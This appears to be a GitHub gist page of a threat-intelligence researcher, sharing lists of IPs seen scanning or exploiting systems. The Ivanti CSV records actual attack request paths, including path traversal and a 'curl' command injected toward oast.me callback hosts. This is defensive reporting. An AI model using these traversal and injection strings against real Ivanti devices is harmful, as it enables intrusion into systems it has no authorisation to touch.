Andrew Morris andrew-morris

Keybase proof

I hereby claim:

  • I am andrew---morris on github.
  • I am morris (https://keybase.io/morris) on keybase.
  • I have a public key whose fingerprint is 1F50 1325 8595 EC49 9A71 8AD1 C0B9 E4CA 97CE 2C60

To claim this, I am signing this object:

@andrew-morris
andrew-morris / ivanti.csv
Last active February 8, 2024 09:55
IPs that are scanning for, or exploiting, vulnerable Ivanti devices (a la GreyNoise) - Updated Feb 01 2024
Start Time, Stop Time, Src IP, Src Country, Src ASN Name, URI, URI Path
1705410897884,1705410913832,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code","/api/v1/totp/user-backup-code"
1705427130797,1705427132894,45.77.220.169,US,"AS-CHOOPA","<IP>/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection","/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection"
1705438981268,1705438981905,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me","/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me"
1705439136337,1705439136975,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjev7jug2jtnphga8igpw9kab6pazpi5.oast.pro","/api/v1/totp/user-backup-code/../../
curl -s https://gist.githubusercontent.com/gnremy/c546c7911d5f876f263309d7161a7217/raw/170f7d6cf92172443ecc68db0b6cbd4d8226a398/CVE-2021-44228_IPs.csv | cut -d, -f1 | while read ip;do curl -XGET -s https://api.greynoise.io/v3/community/$ip;done | jq -s
andrew-morris / 7aac1a57-4f05-48db-8d55-950674d3eefc.csv
Created October 13, 2021 14:13
IPs scanning or attacking hosts in exclusively Israel
ip classification first_seen last_seen
andrew-morris / big_dns_requests.md
Created July 15, 2020 18:59
big dns requests

I'm doing a bit of cursory research into GreyNoise data WRT CVE-2020-1350.

The following IPs have blasted the Internet with large DNS requests (>1000 bytes) in the past 24 hours:

(sorted by packet count)

  16 89.196.51.73
  13 5.209.199.204
  12 62.102.143.106
  10 188.212.245.149
andrew-morris / adb_worms.csv
Created July 11, 2018 19:23
Source: GreyNoise Intelligence
ip,tag_name,category,confidence,org,rdns,rdns_parent,datacenter,asn,country,type,os,tor,created,updated
andrew-morris / jacked.txt
Last active July 5, 2018 23:31
Quick research to find the most (relatively) unsafe ASNs using GreyNoise Intelligence
RATIO ASN POPPED SIZE ORG
0.3945 AS52635 404 1024 SPEEDCONNECT - TECNOLOGIA E EQUIPAMENTOS
0.2500 AS60490 1 4 MTS PJSC
0.2500 AS198517 1 4 DOLNET GROUP sp. z o.o.
0.2158 AS263256 442 2048 PROVEDOR DE INTERNET EXTREMA LTDA - ME
0.2080 AS264643 213 1024 Enredes S.A.
0.1941 AS133469 795 4096 Multinet (Udaipur) Private Limited
0.1592 AS263051 326 2048 Infopardall Ltda me
0.1426 AS133692 146 1024 Fastnet Communication Pvt. Ltd.
0.1406 AS135195 36 256 NS COMPUTERS

Keybase proof

I hereby claim:

  • I am andrew-morris on github.
  • I am morris (https://keybase.io/morris) on keybase.
  • I have a public key ASBlpwslKu2sXbUuQprFS7K1c0TheWE4rgh79uiwuUYNlQo

To claim this, I am signing this object: